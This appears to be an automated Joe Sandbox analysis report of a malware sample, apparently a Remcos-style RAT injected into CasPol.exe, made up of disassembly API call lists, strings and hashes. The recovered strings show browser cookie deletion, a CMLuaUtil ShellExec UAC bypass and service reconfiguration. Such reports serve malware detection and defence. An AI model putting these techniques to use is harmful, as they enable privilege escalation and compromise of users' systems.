                                                                                                                    • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                                    • API String ID: 1133728706-4073444585
                                                                                                                    • Opcode ID: b7833b902b695f010b7617348f22c2584744ac3948717f68c122fa1f71bb7e31
                                                                                                                    • Instruction ID: c183ecd3189b8021203cc80da109e2de7a31ac9d6a13988019f9cddb43f3bc3e
                                                                                                                    • Opcode Fuzzy Hash: b7833b902b695f010b7617348f22c2584744ac3948717f68c122fa1f71bb7e31
                                                                                                                    • Instruction Fuzzy Hash: 84216D71900219A6CB04F7B2DCA69EE7764AE95318F40013FA902771D2EB7C9A49C6DE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: dfab428511212000b980b964f0fa0b3b0c66161db3c5fab27109bb8a214377e5
                                                                                                                    • Instruction ID: c456bd3af877b6cafd4b53f13a87e342c7fa5de46f767ee01c057a6e18c8cad8
                                                                                                                    • Opcode Fuzzy Hash: dfab428511212000b980b964f0fa0b3b0c66161db3c5fab27109bb8a214377e5
                                                                                                                    • Instruction Fuzzy Hash: 401102B1508615FBDB206F729C4593B7BACEF82772B20016FFC05C6242DA3CC801D669
                                                                                                                    APIs
                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                                                                                    • int.LIBCPMT ref: 0040FC0F
                                                                                                                      • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                                      • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                    • String ID: p[G
                                                                                                                    • API String ID: 2536120697-440918510
                                                                                                                    • Opcode ID: 21b0a4efc7602d160aff57bcb0434e0537ff44c0ab5ab895835da1e08b7de2e9
                                                                                                                    • Instruction ID: 57388c14a05e53b5f50c1e79e3c37d993a50775a9f2b0ccff9e8b1bf96635e0f
                                                                                                                    • Opcode Fuzzy Hash: 21b0a4efc7602d160aff57bcb0434e0537ff44c0ab5ab895835da1e08b7de2e9
                                                                                                                    • Instruction Fuzzy Hash: BD110232904519A7CB10FBA5D8469EEB7289E84358F20007BF805B72C1EB7CAF45C78D
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0044FA32: _free.LIBCMT ref: 0044FA5B
                                                                                                                    • _free.LIBCMT ref: 0044FD39
                                                                                                                      • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                      • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                    • _free.LIBCMT ref: 0044FD44
                                                                                                                    • _free.LIBCMT ref: 0044FD4F
                                                                                                                    • _free.LIBCMT ref: 0044FDA3
                                                                                                                    • _free.LIBCMT ref: 0044FDAE
                                                                                                                    • _free.LIBCMT ref: 0044FDB9
                                                                                                                    • _free.LIBCMT ref: 0044FDC4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 776569668-0
                                                                                                                    • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                                    • Instruction ID: b610107d28af63220697d29f7fc6270dd0ec529a0d2d9973413717ad3690abbb
                                                                                                                    • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                                    • Instruction Fuzzy Hash: B5116071581B44ABE520F7B2CC07FCB77DDDF02708F404C2EB29E76052EA68B90A4655
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                                                                    • _free.LIBCMT ref: 100092AB
                                                                                                                      • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                      • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                    • _free.LIBCMT ref: 100092B6
                                                                                                                    • _free.LIBCMT ref: 100092C1
                                                                                                                    • _free.LIBCMT ref: 10009315
                                                                                                                    • _free.LIBCMT ref: 10009320
                                                                                                                    • _free.LIBCMT ref: 1000932B
                                                                                                                    • _free.LIBCMT ref: 10009336
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4500070405.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4500044191.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4500070405.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_10000000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 776569668-0
                                                                                                                    • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                    • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                                                                    • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                    • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                                                                    APIs
                                                                                                                    • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406835
                                                                                                                      • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                                                                                      • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                                    • CoUninitialize.OLE32 ref: 0040688E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeObjectUninitialize_wcslen
                                                                                                                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                                    • API String ID: 3851391207-2637227304
                                                                                                                    • Opcode ID: 37e49e74ace5e8c7de8c35aba96b6244217e4573d21f95b04fe8e6107b657e82
                                                                                                                    • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                                                                                    • Opcode Fuzzy Hash: 37e49e74ace5e8c7de8c35aba96b6244217e4573d21f95b04fe8e6107b657e82
                                                                                                                    • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                                                                                    APIs
                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                                                                                    • int.LIBCPMT ref: 0040FEF2
                                                                                                                      • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                                      • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                    • String ID: h]G
                                                                                                                    • API String ID: 2536120697-1579725984
                                                                                                                    • Opcode ID: 8c8f0d1d08d765d4a28e06ad20e8fb44e6fb0a24af2cea39948b13a93e2f9581
                                                                                                                    • Instruction ID: faa6495482ffb760010bfa20be6f485864068761b5f97391b19e5f0bde606c56
                                                                                                                    • Opcode Fuzzy Hash: 8c8f0d1d08d765d4a28e06ad20e8fb44e6fb0a24af2cea39948b13a93e2f9581
                                                                                                                    • Instruction Fuzzy Hash: 10119D3190041AABCB24FBA5C8468DDB7699E85718B20057FF505B72C1EB78AE09C789
                                                                                                                    APIs
                                                                                                                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                                                                                    • GetLastError.KERNEL32 ref: 0040B2EE
                                                                                                                    Strings
                                                                                                                    • UserProfile, xrefs: 0040B2B4
                                                                                                                    • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                                                                                    • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                                                                                    • [Chrome Cookies not found], xrefs: 0040B308
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: DeleteErrorFileLast
                                                                                                                    • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                                    • API String ID: 2018770650-304995407
                                                                                                                    • Opcode ID: cce28e2294b529603f17114cb80ebac831a723e33fe1408caf9503476a799aea
                                                                                                                    • Instruction ID: 57831ae66bbe87b328e3caf482cfdb9a18bfb77b2c204d956758bc207329a0f7
                                                                                                                    • Opcode Fuzzy Hash: cce28e2294b529603f17114cb80ebac831a723e33fe1408caf9503476a799aea
                                                                                                                    • Instruction Fuzzy Hash: ED01A23164410557CB0477B5DD6B8AF3624ED50708F60013FF802B22E2FE3A9A0586CE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Rmc-B3IX49$BG
                                                                                                                    • API String ID: 0-2803776138
                                                                                                                    • Opcode ID: b400c12b05c9e5cfb729653fd7a91a891c92a570d8021ffcb9c35e87f5e75d17
                                                                                                                    • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                                                                                    • Opcode Fuzzy Hash: b400c12b05c9e5cfb729653fd7a91a891c92a570d8021ffcb9c35e87f5e75d17
                                                                                                                    • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                                                                                    APIs
                                                                                                                    • __allrem.LIBCMT ref: 00439799
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397B5
                                                                                                                    • __allrem.LIBCMT ref: 004397CC
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397EA
                                                                                                                    • __allrem.LIBCMT ref: 00439801
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043981F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1992179935-0
                                                                                                                    • Opcode ID: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
                                                                                                                    • Instruction ID: 580a0d75dc01f3f4b0c8d364acae3af6b21ca74026922d198920ae34195595c3
                                                                                                                    • Opcode Fuzzy Hash: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
                                                                                                                    • Instruction Fuzzy Hash: 8581FC71A01B069BE724AE69CC82B5F73A8AF89368F24512FF411D7381E7B8DD018758
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                                                                    • __freea.LIBCMT ref: 10008A08
                                                                                                                      • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                    • __freea.LIBCMT ref: 10008A11
                                                                                                                    • __freea.LIBCMT ref: 10008A36
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4500070405.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4500044191.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4500070405.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_10000000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1414292761-0
                                                                                                                    • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                    • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                                                                    • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                    • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: __cftoe
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4189289331-0
                                                                                                                    • Opcode ID: 07fcb3c060a749777e725642930ed18157a1f5019e1f3146b4d3bc33616e3b2a
                                                                                                                    • Instruction ID: 51d3defa9bee42a6449c1cbae1767e96f335fc55d8793b788aa7c8c1dec457a3
                                                                                                                    • Opcode Fuzzy Hash: 07fcb3c060a749777e725642930ed18157a1f5019e1f3146b4d3bc33616e3b2a
                                                                                                                    • Instruction Fuzzy Hash: DE510A72900205ABFB249F598C81FAF77A9EFC9324F25421FF814A6291DB3DDD01866D
                                                                                                                    APIs
                                                                                                                    • _strlen.LIBCMT ref: 10001607
                                                                                                                    • _strcat.LIBCMT ref: 1000161D
                                                                                                                    • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 1000165A
                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                                                                    • lstrcatW.KERNEL32(00001008,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 10001686
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4500070405.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4500044191.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4500070405.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_10000000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1922816806-0
                                                                                                                    • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                    • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                                                                                    • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                    • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                                                                    APIs
                                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 10001038
                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4500070405.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4500044191.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4500070405.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_10000000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3594823470-0
                                                                                                                    • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                    • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                                                                                    • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                    • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                                                                                    APIs
                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E0C
                                                                                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E20
                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E2D
                                                                                                                    • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419517), ref: 00419E62
                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E74
                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E77
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 493672254-0
                                                                                                                    • Opcode ID: 278cd7c7b1e512cd1ff2c1b40676ad723d9eb82b7f9a8c909b76352d7357707f
                                                                                                                    • Instruction ID: 40159264159f5a90cd52f9b689d0e8cb5e0ea154c732c405bcbf7063391161e0
                                                                                                                    • Opcode Fuzzy Hash: 278cd7c7b1e512cd1ff2c1b40676ad723d9eb82b7f9a8c909b76352d7357707f
                                                                                                                    • Instruction Fuzzy Hash: 09016D311083107AE3118B34EC1EFBF3B5CDB41B70F00023BF626922D1DA68CE8581A9
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(?,?,00437E0D,004377C1), ref: 00437E24
                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E32
                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E4B
                                                                                                                    • SetLastError.KERNEL32(00000000,?,00437E0D,004377C1), ref: 00437E9D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3852720340-0
                                                                                                                    • Opcode ID: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
                                                                                                                    • Instruction ID: 127a8aaeb23cc4eddae083ca6fcd73be4c6f1963697d6e79a1959115bdf772ac
                                                                                                                    • Opcode Fuzzy Hash: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
                                                                                                                    • Instruction Fuzzy Hash: 6701B57211D3159EE63427757C87A272B99EB0A779F20127FF228851E2EF2D4C41914C
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                                                                    • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4500070405.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4500044191.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4500070405.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_10000000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3852720340-0
                                                                                                                    • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                    • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                                                                                    • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                    • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                    • _free.LIBCMT ref: 00446F06
                                                                                                                    • _free.LIBCMT ref: 00446F2E
                                                                                                                    • SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
                                                                                                                    • SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                    • _abort.LIBCMT ref: 00446F4D
